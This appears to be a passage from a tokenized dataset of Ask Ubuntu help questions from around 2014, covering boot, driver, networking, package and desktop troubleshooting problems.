140507 5:11:44 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140507 5:11:44 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 140507 5:11:44 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 140507 5:11:44 innodb : the innodb memory heap is disabled 140507 5:11:44 innodb : mutexes and rw_locks use gcc atomic builtins 140507 5:11:44 innodb : compressed tables use zlib 1.2.8 140507 5:11:44 innodb : using linux native aio 140507 5:11:44 innodb : initializing buffer pool , size = 128.0m 140507 5:11:44 innodb : completed initialization of buffer pool 140507 5:11:44 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation . 140507 05:11:44 mysqld_safe mysqld from pid file /var/run/mysqld/mysqld.pid ended what should i do to resolve this ?
462028	ubuntu 14.04 can not get printing to either canon lbp3300 or canon mg5460	newbie here . both my canon lbp3300 and ( wireless ) mg5460 printers work on my network form windows . i installed ubuntu 14.04 on a desktop , went to canon and downloaded the linux driver package ( cndrvcups-common_2.80-1_i386.deb ) and installed it . the mg5460 was `` seen '' as a netwrok printer so i added it and it looked successful . when i tried to print a test page , the printer display showed that it was receiving data but then nothing . ubuntu displayed `` idle - waiting for job to complete.. '' i have deleted the printer and re-installed several times with the same result . if i could get printing to work i would seriously consider migrating to ubuntu as it does everything else i need . cheers , stephen hicks
462030	can i play windows game using wine and/or through steam ?	when i download wine to play windows games , will i also be able to play those windows games through steam ? i 'm very new to ubuntu and i would need an advise in this regard .
462031	bluetooth unstable on ubuntu 13.10 dual boot with windows 8.1	i have ubuntu 13.10 dual boot with windows 8.1 on my lenovo yoga 2 pro . i have recently started looking into bluetooth for development purposes and noticed that there are issues with it while i am in ubuntu trying to access it . it intermittently disappears from the system tray and also from the bluetooth manager . restarting the system also does n't fix it . however , i did a complete shutdown and booted into ubuntu and saw that bluetooth icon and functionality was back . after some time playing with it , the connection dropped abruptly and again the same behavior reoccurred . hciconfig -a gives me the following : hci0 : type : br/edr bus : usb bd address : 00:00:00:00:00:00 acl mtd : 0:0 sco mtd : 0:0 down rx bytes:0 acl:0 sco:0 events:0 errors:0 tx bytes:6 acl:0 sco:0 commands:2 errors:0 rfkill list gives me the following : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no dmesg | grep bluetooth returns nothing hcitool dev returns : devices : sudo hciconfig hci0 up gives me the following : ca n't init device hci0 : connection times out ( 110 ) sudo rfkill unblock bluetooth did n't help can someone please point me in the right direction to fix this issue ? thanks , abhishek
462034	can´t install ubuntu 14.04	when i try to install ubuntu 14.04 either the x86 or 64 bit version ( i´m using windows 8.1 ) the install process freezes after i choose continue when asked about installing via internet some mp3 stuff . i don´t know what to do anymore . i´ve tried using a usb or dvd and the loading is still going and going but i can´t continue the install process .
462035	folder share in ubuntu as guest on windows 7	i have a problem with setting shared folders . using virtualbox 4.3.10 , with ubuntu 14.04 lts as gust on windows 7 ultimate sp1 64-bit . after first attempt i was not able to see shares i set using virtualbox manager- settings-shared folders , as auto mount . after removing shares using virtualbox manager i restarted ubuntu and i noticed folder names the same as removed shares . folders are not accessible , showing following error : this location could not be displayed . you do not have the permission necessary to view the contents of sf_apollog . it seems that it is bogus error since shares are removed . after setting new share with different name and restarting virtualbox i can see the share but i am still not able to access it with the same error ( above ) . ====================================== hello elder geek , takkat and petronilla escarabajo . thank you very much for your responses . i think i did not make my post clear enough . to reiterate : i am using virtualbox 4.3.10 , with ubuntu 14.04 lts as guest , on windows 7 ultimate sp1 64-bit ( as host ) . i have all additions installed an i am able to create shared folders . the problem was that once i have created , i was not able to access share folders . the error message was : you do not have the permission necessary to view the contents of . . . so i removed shares . later i found a post mentioning that i need to be added to a vboxsf group ( as takkat mentioned ) , which i did . then i have added new shared folders folders and i am able to access them . the problem is that i still have old ( removed ) shared folders listed but they are empty . in other words , they are ghost folders . i did a little experiment and added set of folders as shared , rebooted and removed newly added folders from share . after rebooting again , all folders i have added in this experiment are still listed as shared . how do i remove ghosts ?
462036	error : unknown filesystem ca n't boot anything	i was on ubuntu 12.04.4 32 bit and got an error when i tried to add the ppa for opera and ever since then i had kept getting an error where i could n't use the built in software manager . i tried to boot up windows 7 from a live usb to try and deal with the problem and for some reason ubuntu did n't like my usb stick even though i had it formatted in fat32 and no matter what it could n't use it . i tried using the wipe program by installing it and activating it through the terminal , but when i noticed it was going to take 9 weeks i closed out of the terminal and try using the ubuntu bios to try and deal with the problem . when i turned on my computer i was presented with the words `` error : unknown filesystem grub rescue > , i tried using every single command that i could find online to get something working to no avail . i am now looking at my computer being no more than just spare parts right now . i need severe help at this point , either getting the computer as it is to recognize the usb or being able to at least log in to ubuntu at this time .
462037	need help automatically starting wireless - can start from command line	installed 14.04 on an hp zv6000 , and if i run : sudo modprobe -r b43 ssb sudo modprobe b43 then wireless works perfectly , but i have to run it each time from a terminal . i 'm a novice at ubuntu - which file can i add these commands to so that wireless starts up when the computer first turns on from power off , and also from sleep mode ?
462039	toshiba nb505 fails to connect to wifi in 14.4 lts	i had a clean install with ubuntu 14.4 and the wifi connected with out a problem . now it it recognizes all the surrounding wifi , including my own but will not connect or connects intermittently even if i 'm sitting next to my router . what gives ?
462040	debootstrap centos under ubuntu ?	i am needing to compile an app under an older version of centos . i once found a way of doing a debootstrap style process for it . can anyone recall the name of the program and how you set it up for chroot ?
462041	network connects slowly or not at all	okay , so my network card id is f6d6050 . i use ndiswrapper and have it all correctly installed . funnily though , i have to run sudo modprobe -v ndiswrapper every time i log on in order for it even to bother searching for a network . the problem here though , as you can probably guess from the title , is that most days it takes 5-10 minutes to successfully connect to the network . most times it asks several times to confirm my network key , and it will occasionally even refuse to connect until i restart my computer . any ideas ? is there any code that may be helpful in finding out ? thanks .
462048	is my hdd broken ? busybox problem	in past two months i have had two `` superblocks '' ( now , running 14.04 , previously using 13.10 ) , not been able to start ubuntu as usual , and getting a message similar to this : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) if i start with a live usb , i ca n't mount the hard drive . ( i tried this , but it did n't help me ) . but if i reinstall ubuntu , it seems to work fine . but i thinks it 's not normal have this problem so often . could all this mean that my hdd is broken ?
462052	opengl in ubuntu	i 'm new to ubuntu . i 'm using opengl in visual studio 2010 in windows platform using c++ language . now i 'm migrate to ubuntu 12.04 . can i do the same on ubuntu ? if yes . what is the way i have to do.. ( concern am i use visual studio like tool in ubuntu )
462053	battery threshhold	i recently installed ubuntu 14.04 , which is really nice but my battery is not charging past 59 % . i recall tinkering with lenovo battery management on windows to reserve the life span but i wiped windows so i ca n't get to the settings . i followed this post how can i limit battery charging to 80 % capacity ? and did the following by installing tp smapi but it 's in a different directory than the one posted , it 's under usr/src and i see the file along with folders there . what are the next steps to change the charge rate to 100 % and keeping those settings permanent ?
462055	why do i have new and strange networks ( _not wifi_ ) in my network manager ? 14.04	ok , so i updated my system to 14.04 last week ( running on a dell xps13 ultrabook- but i 'm not a developer , not particularly technically minded ) . some strange things happened with network manager . first , it stopped communicating with my 3g modem ( sierra aircard 312u ) . around $ 100 later i have a 3g router broadcasting a wireless signal that i can hook up to ( although ubuntu lost the signal overnight and i had to restart the computer to get it communicating again ) . this has been deeply frustrating and unwelcome . but its not the weird bit . i have two unknown networks listed in the network manager 's dropdown box . the first is for a `` galaxy note3 network '' . the second is for `` tsai 's iphone network '' . wifi networks , ( including my phone 's hotspot ) and all the usual stuff is listed below these two . ( if i tether my phone to the computer to access the internet ( i.e . hook up a cable ) , the list says `` wired connection 1 '' , then tsai 's and galaxy note3 would appear next , with wifi options in a section below that ) . i can not edit connections for either of these new networks , or gather any settings info at all - or even delete them . they are persistent across restarts . any ideas ? anyone else ? have i somehow been hacked by a clumsy infiltrator ? i downloaded the update from the australian mirror . edit picture of the menu
462061	dash menu applications not showing	i did some disable to hide dash pugins ( click and disable the dsah pugins ) now in dash menue ( not home screen ) application are not showing , so i enable the dash plugins so they ( dash plugins ) are showing but no application..if i type and search the application it show but other time no application are showing . i unlcik the filter and do many things but nothing works
462063	new laptop wo n't boot after installing ubuntu 14.04 on ssd	i removed the hdd from a toshiba computer i bought today and installed a 250gb ssd . after installing it , i immediately installed ubuntu 14.04 on it from a usb drive . everything went fine during installation , but when i restarted i got the message `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' . that message came up after a nano second screen that says `` checking media presence '' and then `` no media present '' . when i reboot using the usb stick , i can see the ssd drive and it has the os written on it and it looks like it 's been partitioned correctly . can someone please tell me what i need to do to get my computer to boot up ? i read something about how the secure boot and csm or uefi might be a factor , but i 'm not experienced enough with new bios to know how to configure those settings . i also read about grub probably not installing on the ssd and i might just have to fix grub for it to work , but i have n't been able to do that through the ubuntu running of the usb stick . any help or links to good threads would be very helpful . if you have any questions , i would be very happy to help you in helping me . http : //paste.ubuntu.com/7407446/
462064	problem installing evga gtx 760 on ubuntu 14.04	i have been trying to installing a nvidia gtx760 on a ubuntu 14.04 , but i canâ´t get any image from the video card , so i am using the vga from the mother board , and i have been trying to install the .run ( nvidia-325 ) sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-325 ( dont work ) from the nvidia page but it dont work out , do you know how can i get fix this and by the way shoud i install cuda 5.5 or cuda 6 , i have read that cuda 6 is not well supported in ubuntu 14.04 , thanks in advance
462066	apt-get does not install any programs or update after upgrade from 11.04 to 14.04 ( lts )	i 've upgraded from 11.04 to 14.04 and i have some issues when using apt-get . below is an example of what i get when trying to install mysql-server ( same issue for any package installation ) : ~ $ : sudo apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mountall : breaks : initscripts ( < 2.88dsf-24 ) breaks : initscripts : i386 ( < 2.88dsf-24 ) mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . here is a an output of sudo apt-get install -f posted on paste bin . i 've also done apt-get remove , clean purge and autoremove which seems no luck . how can i get this fixed ? edit here is the result of apt-cache policy initscripts ~ $ apt-cache policy initscripts initscripts : installed : 2.88dsf-13.10ubuntu11.1 candidate : 2.88dsf-41ubuntu6 version table : 2.88dsf-41ubuntu6 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages *** 2.88dsf-13.10ubuntu11.1 0 100 /var/lib/dpkg/status
462070	how to remove both 'unity-control-center ' and 'gnome-control-center ' ?	i started off with ubuntu 14.04 and decided that i wanted to change it into a minimal xfce install . i want to remove unity-control-center , but apt-get installs gnome-control-center . deleting gnome-control-center reinstalls unity-control-center ... what should i do ? i want to just use the xfce settings .
462071	difference between specifying a mass and creating one	i am creating a virtual network and on this i want to test out ubuntu server on 8 virtual servers working together like a cloud . i got to the point where it asks the following : what is the difference in specifying a maas or creating a new mass on this server . how will this affect the other servers and how will this affect the current one .
462073	how to uninstall ubuntu 14.04 ?	i have installed ubuntu 14.04 in dual boot with windows 8.1 and want to know as to if ever in future if i need to remove ubuntu . how will i do that ? please help .
462075	uninstall ubuntu 14.04 lts	hi i ‘m 1 day old to ubuntu , i installed ubuntu 14.04 lts on my windows 8 on 4-may-2014 , even after giving the option boot along side win 8 , it over wrote win8 and starts ubuntu 14. now i have no access to windows 8 at all neither to the files on my laptop . i tried using my windows boot recovery but nothing happened . i tried using os uninstaller by using ubuntu boot cd with cmds “sudo add-apt-repository ppa : yannubuntu/boot-repair” and “sudo apt-get update ; sudo apt-get install -y os-uninstaller & & os-uninstaller” but i don’t get os uninstaller , what is the right cmmds for restoring windows or atleast getting access to my files . i have tried booting with a usb bootstick also . pls hlp
462076	problem enabling mobile broadband d-link dwm-156	i am using ubuntu 14.04 lts 32bit and d-link dwm-156 modem . when i plug the modem , it 's detected and works fine . but when i replace the simcard it 's not working and the mobile broadband can not be enabled . it 's seems like it 's only working with the first simcard inserted to it . i tried to replace with another simcard too , but still the same . it 's only work with first simcard . can anyone help ?
462085	deja-dup repeatedly asks encryption password	folks , i have been in trouble with deja-dup , ubuntu backup utility . it asks encryption password every time when back up starts . i entered every related passwords ( server 's one , client 's one , and all things i think related ) , but it does not help . after entering encryption password , deja-dup works for some time and asks password again . i expected this symptom has been solved in 14.04 , but unforatunately deja-dup in 14.04 has exactly the same case . here is my environment of backup ... my laptop computer ( thinkpad x220 ) is scheduled to be backed up files under my home directory in every week . the destination of backup is my office computer ( running ubuntu 12.04 ) . this backup is made using ssh connection ( so , selection of backup style in deja-dup is `` ssh '' ) . help , suggestion and answers appreciated .
462086	ubuntu one ( application ) on ubuntu software center	i went on the ubuntu software center to get ubuntu one ( application ) , found it and clicked it . then shows `` not found there isn’t a software package called “ubuntuone-control-panel-qt” in your current software sources . '' i have ubuntu 14.04 lts .
462087	openbve not starting in trusty	why does n't openbve work in trusty ( 14.04 ) ? when i launch it it says the program has crashed . please help me it crashes each and everytime
462090	proxy server security	i installed squid , and in this server guide , there are some security configurations . is there any risks when using a proxy server ? what are squid security threats ?
462092	can not logout ubuntu	i can not log out . it does not do anything or the system hang when i click on log out . i use ubuntu 13.10 . i have to restart the computer every time i need log out . are there any place to check the issue ? your information and help is great appreciated , regards , inung
462094	unable to install libssl1.0.0 : i386 due to `` unmet dependencies '' ?	i have read and followed the advice in this question to no avail . i am attempting to install libssl1.0.0 : i386 on my 14.04 box ( amd64 ) , but when i try to do this via apt , i receive the following error message : nathan @ nathan-desktop : ~ $ sudo apt-get install libssl1.0.0 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : default-jre-headless : depends : openjdk-7-jre-headless ( > = 7~u3-2.1.1 ) but it is not going to be installed openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u55-2.4.7-1ubuntu1 ) but it is not going to be installed recommends : libgnome2-0 but it is not going to be installed recommends : libgnomevfs2-0 but it is not going to be installed openssh-client : depends : libssl1.0.0 ( > = 1.0.1 ) but it is not going to be installed openssh-server : depends : libssl1.0.0 ( > = 1.0.1 ) but it is not going to be installed depends : openssh-sftp-server but it is not going to be installed recommends : ssh-import-id but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i have all of the latest updates installed . i have run apt-get -f install . i have made sure that all repositories are enabled in software sources . what could be causing this ? update : here are the contents of apt-cache policy libssl1.0.0 : libssl1.0.0 : installed : 1.0.1g-1ppa1~trusty1 candidate : 1.0.1g-1ppa1~trusty1 version table : *** 1.0.1g-1ppa1~trusty1 0 100 /var/lib/dpkg/status 1.0.1f-1ubuntu2.1 0 500 http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ trusty-security/main amd64 packages 1.0.1f-1ubuntu2 0 500 http : //ca.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages ... and apt-cache policy libssl1.0.0 : i386 : libssl1.0.0 : i386 : installed : ( none ) candidate : 1.0.1f-1ubuntu2.1 version table : 1.0.1f-1ubuntu2.1 0 500 http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates/main i386 packages 500 http : //security.ubuntu.com/ubuntu/ trusty-security/main i386 packages 1.0.1f-1ubuntu2 0 500 http : //ca.archive.ubuntu.com/ubuntu/ trusty/main i386 packages
462096	how to integrate vlc media player to sound indicator on ubuntu panel ?	how to make vlc music player ( or any other player ) default music player and integrate it to the sound indicator in ubuntu panel in ubuntu 13.10 . rhythmbox is the player currently available . update : the solution of checking `` d-bus , '' given on various other websites ( like webup8 ) does n't work . the d-bus option has moved to all settings > control interfaces . checking the d-bus control interface though , no more works .
462097	how can i get around failed to fetch error upgrading to ubuntu 14.04 trusty tahr ?	in trying to upgrade to ubuntu version 14.04 trusty tahr either by following a prompt which appeared every boot up or by going to the software update , after fetching the release upgrade tool , the upgrade fails with the message : failed to fetch fetching the upgrade failed . there may be a network problem . any help appreciated , matt
462098	want to select ubuntu grub as default	i first installed windows 8 professional . later i installed ubuntu 13.10 as bootable os and updated to ubuntu 14.04 . later i installed elementry linux and its grub take over the ubuntu grub.. i do n't like elementry os grub . i want that ubuntu grub should run instead of elementry os grub.. i seen in ububtu /boot/grub , there are all files in that.. even i tried to update-grub and it detected elementry os , windows , and ubuntu but i want grub mrnu of ubuntu , not of that elementry os . plz plz and plz do n't say to reinstall ubuntu like options.. my net connection is slow and it takes a lot time to update ubuntu to 14.04 from 13.10..
462099	xubuntu 14.04 lts not able to boot	i finished installing xubuntu 14.04 lts ( x86 version ) . after restarting my system , it hangs for maybe 10 to 15 seconds and then displays this in the command prompt : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/05faf353-bde5-4e3e-9695-2458d8b18cb2 does not exist . dropping the shell ! busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . suggestions on correcting this ? my system is an old pentium 4 ( 2 gb ram , 3.06 ghz hyper-threading cpu , 82845g/gl [ brookdale-g ] /ge i915 intel graphics controller [ 64 mb ] , two 400 gb ide hard drives )
462100	post ubuntu installation :	post ubuntu installation is it necessary to install the motherboard drivers . as i used to install after installing windows os . because after i installed the ubntu 14.04 succesfully i insterd my motherboard cd as usual i was giveing the archive error .plz reply
462102	screen turns negative randomly	i 've recently done a clean installation of ubuntu 14.04 on macbook air 2008 , the display randomly turns grainy negative , it 's not specific to any application and it can last anywhere from a split second to over a minute . i 'm quite certain it 's not hardware related , i had 13.04 installed previosuly and it never happened then . i would really appreciate any help .
462103	how to press buttons in a dialog window from terminal ?	i do n't get what to do ! how do i press < ok > ? i clicked on it , typed ok , pressed enter , everything !
462107	how does one install a minimal gnome-shell ?	i 've just installed xubuntu and removed everything i do n't need . now i 'd like to install gnome -shell but not any of the other gnome packages . ideally , i 'll have only xfce related programs with the addition gnome-shell ( and everything needed to have a fully functional gnome-shell panel / system tray ) . what is the proper way to accomplish this ? i 'd like to keep the number of installed packages to a minimum .
462108	offline upgrade of ubuntu 13.04 to 13.10	i 'm trying to do an offline upgrade of ubuntu without using cdrom . i tried somne of options listed in the below links : how to upgrade ubuntu from an iso image how to use a .iso image as a cd-rom repository ? the issue i 'm facing is that when i boot from a `` live '' usb of ubuntu 13.10 , gui does not provide an option upgrade existing installation of ubuntu 13.04 . when mounting the ubuntu live iso inside existing ubuntu installation and adding it to the software sources list , i 'm able to update individual package , but not the entire release . specifically , when i go offline and try the do-release upgrade from terminal , it is not able to find any updates to os . can you please guide me to upgrade 13.04 to 13.10 from the mounted iso ? note : my pc already has windows 7 and windows 8 installed . it loads off the windows 7 bootloader and is linked to grub by using easy bcd .
462112	nofile ulimit -n on ubuntu 14.04 lts	➜ sudo sysctl -a|grep file fs.file-max = 2037581 fs.file-nr = 2784 0 2037581 ➜ ~ cat /proc/sys/fs/file-max 2037581 ➜ ~ cat /proc/sys/fs/file-nr 2720 0 2037581 /etc/security/limits.conf * hard nofile 2037581 * soft nofile 2037581 root hard nofile 2037581 root soft nofile 2037581 /etc/pam.d/su session required pam_limits.so /etc/pam.d/common-session session required pam_limits.so then reboot . but ulimit -n got 1024 again . only can ulimit -n 4096 as max value or got error ulimit : value exceeds hard limit
462114	there is no /etc/gdm directory ?	i 'm using ubuntu 13.10 and trying to add some startup scripts to gdm login screen . i found 4 places in documentation of gdm to do so : /etc/gdm/init /etc/gdm/postlogin /etc/gdm/presession /etc/gdm/postsession but as the matter of fact , there is no /etc/gdm directory in my linux machine . can anyone help me out here ?
462119	lubuntu updating via the command line	to update ubuntu , i periodically use apt-get update and apt-get dist-upgrade . is this or is this not advisable for lubuntu on a low-spec machine ( single core 2.66 ghz , 1gb memory ) ? will use of it cause lubuntu to `` bloat '' to the point of defeating the original design intentions of lubuntu .
462120	nokia lumia 625 wo n't mount in ubuntu 14.04	there seem to be several issues around various models of nokia lumia not mounting in various flavours of ubuntu . i do n't suppose there 's a stock answer ?
462121	/tmp can not mount m or s ? i did m	ok i got this message while ubuntu 12.04 was loading up : the disk drive for /tmp is not ready yet . s to skip mount or m for manual recovery i pressed m and then login page appeared . i enter my login info and a black terminal appears and disappeared very fast ( i ca n't read what it says ) then it goes back to the login page again . i run this command in an attempt to fix this . sudo mount /dev/sda5 no use it tells me its already mounted any idea ? ? i hate to re install the whole thing please help me fix this my /dev/sda5 is ext4 here is the result to sudo df /etc/fstab http : //paste.ubuntu.com/7411037/ result for sudo cat /etc/fstab : http : //paste.ubuntu.com/7411040/ result for sudo fdisk -l : i will try to post in comment . do n't have enough reputation to post more than two here
462122	xrandr error when using using 2560x1440 monitor	i have an 2560x1440 monitor on an intel hd graphics adapter . since intel hd can not by default drive a display higher than 1920x1200 , i used in ubuntu 12.04 the following trick ( derived from https : //plus.google.com/+linustorvalds/posts/hqscy7eral4 ) : xrandr -- newmode `` 2560x1440 '' 222.52 2560 2720 2992 3424 1440 1441 1444 1477 -hsync +vsync xrandr -- addmode hdmi1 2560x1440 xrandr -- output hdmi1 -- mode 2560x1440 the modeline was found using gtf 2560 1440 44 in ubuntu 14.04 this does not work anymore : when trying to switch to the 2560x1440 mode i get xrandr : configure crtc 0 failed corresponding xorg.log entries : [ 1067.430 ] ( ii ) intel ( 0 ) : switch to mode 2560x1440 @ 40.0 on hdmi1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 1067.824 ] ( ee ) intel ( 0 ) : failed to set mode : invalid argument [ 1067.874 ] ( ii ) intel ( 0 ) : switch to mode 1920x1200 @ 60.0 on hdmi1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none any ideas how to get around this problem ?
462123	pipe symbol executes from left to right or right to left ?	how pipe symbol executes from left to right or right to left ? ls -l | grep `` aug '' | sort +4n so first ls -l will be executed or sort +4n ?
462127	problem running command on startup	i have an msi gt-70 with a steel series keyboard that lights up several different colors . i have it working using npm and node.js and a lot of help from wearefractal on github ( thank you wearefractal ! ) lighting the keyboard works fine . i can open a terminal and type node server.js and the keyboard lights up . the problem is getting it to work on boot . when i had my computer set up as a dual boot win 8/ubuntu 12.04 i put the following code in /etc/rc.local node /home/mark/server.js and the keyboard lit up after boot . now that i am using ubuntu 14.04 in bios mode , this trick no longer works . i have inserted the code in /etc/rc.local i have created a script , chmod 775 the script and placed it in /etc/init.d i have even modified /etc/init.d/rc.local to include the command , but i still can not get the keyboard to light up after boot . what am i doing wrong ?
462128	how to execute a script file inside folder on which user do n't have read and write privileges ( in ubuntu 12.04 )	i have two users ( administrator , normal ) . i want that the administrator is able to read , write , execute and delete files inside specific folder while normal user is unable to create , write and delete files inside that folder while he can only execute a specific script which is inside that folder , the script requires reading of other files inside that folder . is it is possible to execute the script from by normal user on behalf of administrator without giving administratorâs password ? ? or can we make a script which is run by normal user while giving password in encrypted format ? ? using sticky bit my problem can not be solved as it is used to avoid deletion of a folder and its content by other users though they have write permissions on folder contents .
462130	is it possible to make ubuntu portable on my hhd	hello is it possible to fully install ububtu in an external hdd and then work on my ubuntu as long as i take my hdd . a portable os fully installed on a external hdd
462131	g++ 4.8.2 on ubuntu 14.04 fails to compile source files	i 'm really frustrated at present in that g++ is throwing up so many errors even on a simple .cpp file . i 'm typing : g++ test.cpp at the command line . thanks in advance for any help . i downloaded g++ from the software centre . # include < iostream > using namespace std ; int main ( ) { cout < < `` hell world '' < < endl ; } these are the first 2 errors when invoking g++ from the command line : in file included from /usr/include/x86_64-linux-gnu/c++/4.8/bits/c++config.h:426:0 , from /usr/include/c++/4.8/iostream:38 , from test.cpp:8 : /usr/include/x86_64-linux-gnu/c++/4.8/bits/os_defines.h:44:19 : error : missing binary operator before token `` ( `` # if __glibc_prereq ( 2,15 ) & & defined ( _gnu_source ) ^ in file included from /usr/include/c++/4.8/cwchar:44:0 , from /usr/include/c++/4.8/bits/postypes.h:40 , from /usr/include/c++/4.8/iosfwd:40 , from /usr/include/c++/4.8/ios:38 , from /usr/include/c++/4.8/ostream:38 , from /usr/include/c++/4.8/iostream:39 , from test.cpp:8 : /usr/include/wchar.h:74:43 : error : missing binary operator before token `` ( `` # if defined __cplusplus & & __gnuc_prereq ( 4 , 4 )
462133	sorry , could not display all the contents of “storage” : libmtp error : could not get object handles	everyone ! i use ubuntu 14.04 64bit with gnome shell . i try connect my windows phone 7.8 nokia lumia 710 . but i can not access to files . when i try open storage on rm803 , nokia lumia 710 by files app , i see this message : sorry , could not display all the contents of “storage” : libmtp error : could not get object handles . i ca n't attach image to this post , so i post my desktop prtsc to http : //pbrd.co/1qd5jli i read this forum question how do i browse nokia lumia 610 files ? , but i ca n't install any ftp server on my windows phone . i try solve my problem by instruction in this article getting mtp enabled devices to work with ubuntu ? . but i do n't have a success . i copy result of mtp-detect to http : //pastie.org/9148025 . i also add line to 51-android.rules pnck @ ubuntuu : ~ $ cat /etc/udev/rules.d/51-android.rules subsystem== '' usb '' , attp { idvendor } == '' 045e '' , attr { ipproduct } == '' 04ec '' , mode= '' 0666 '' can you help me ?
462135	touchpad issue : jumping cursor while typing ( ubuntu 14.04 ) , syndaemon do n't help	i know there are other questions about this issue , but i ca n't find the right tweak in order to fix it . the touchpad still detects my palms while typing stuff . it 's really annoying , especially because it spoils my productivity on my brand new dell xps gold edition . it 's a fresh ubuntu 14.04 install and i do n't want to mess around trying scripts and stuff that would finally break the touchpad recognition . i tried to use syndaemon as it looks like it 's the best workaround for this bug : syndaemon -i 0.5 -d when i try it on the terminal , it seems to work as long as i do n't log out from my session . but if i put the command on my start-up programs utility , and i reboot , the cursor always freezes after a minute or two . so i must uncheck the command using my keyboard and i 'm back to this very annoying palm detection stuff . any solution ? some info about my system : greguti @ greguti-xps13-9333 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synaptics synaptics large touch screen id=9 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] greguti @ greguti-xps13-9333 : ~ $ xinput list-props `` synps/2 synaptics touchpad '' | grep -i finger synaptics finger ( 288 ) : 25 , 30 , 0 synaptics two-finger pressure ( 294 ) : 282 synaptics two-finger width ( 295 ) : 7 synaptics two-finger scrolling ( 298 ) : 1 , 1
462138	libreoffice impress importing eps images	i 'm using ubuntu 14.04 x64 desktop as os . trying to prepare a slideshow , when adding .eps image drawings to a slide there is no problem at all . but when i hit f5 to start slide show , slide that includes .eps image does not shown in output . nothing just an empty screen appears . althoug i have an external monitor , current slide does not shows .eps imported image but next slide area shows it . also tried to with unchecking tools > options > libreoffice > view > `` use hardware acceleration '' . nothing changed . here is a screen shot of my outputs . on the right is presentation output , on the left is presentation helper screen . http : //oi57.tinypic.com/2rp2qa0.jpg both slides included .eps image
462141	found viruses on my machine by clamtk . need help catching hackers	i ran clamtk on my 14.04 laptop and found 3 pua 's including one for phishing . i found them in /home/draeko/.cache/mozilla/firefox/jsobiwpi.default/cache/9/08/64101d01 ... /cache/4/2c/bs149d01 ... /cache/2/b7/122b8d01 the first two were pua.script.packed-1 and the third one was the pua.phishing.bank . i keep everything high security on my distro so these were the result of hackers . i have a gmail account that i ca n't access which also was hacked ( i was being subscribed to newsletters and then when i contacted the companies they said i must 've been hacked ) and the only ip that showed up was my own in the account history section . can someone please help me catch these hackers ? i 've been dealing with it for too long .
462143	where are the startup scripts for unity desktop ?	i want to run a script as soon as my lightdm authentication succeed , and my unity starts loading . and i want to run my scripts as a root user . where are startup scripts located in unity ?
462148	gnome-dictionary does not use german freedict dictionaries	first i have installed dictd and some dictionaries according to the firs post in this topic . i have installed dict-gcide & dict-wn & dict-freedict-hun-eng & dict-freedict-eng-hun . i have tried it , it is working . after i have installed dict-freedict-deu-eng & dict-freedict-eng-deu , i have got these message : '' setting up dict-freedict-deu-eng ( 1.3-4ubuntu1 ) ... the parameter -- locale=xx_yy.utf-8 was not set in your /etc/default/dictd , so after installing this package dictd may stop working . setting up dict-freedict-eng-deu ( 1.3-4ubuntu1 ) ... the parameter -- locale=xx_yy.utf-8 was not set in your /etc/default/dictd , so after installing this package dictd may stop working . '' the gnome-dictionary did not search for german words , it writes : `` error while looking up definition '' after i removed the hashmark ( # ) before the line `` dictd_args= '' $ dictd_args -- locale=en_us.utf-8 '' '' in the file /etc/default/dictd , i have restarted the dictd service , but my attempt was not successful . i still ca n't search for german words in gnome-ditionary . can anybody help me to solve this issue ? i have ubuntu 12.04 64 bit .
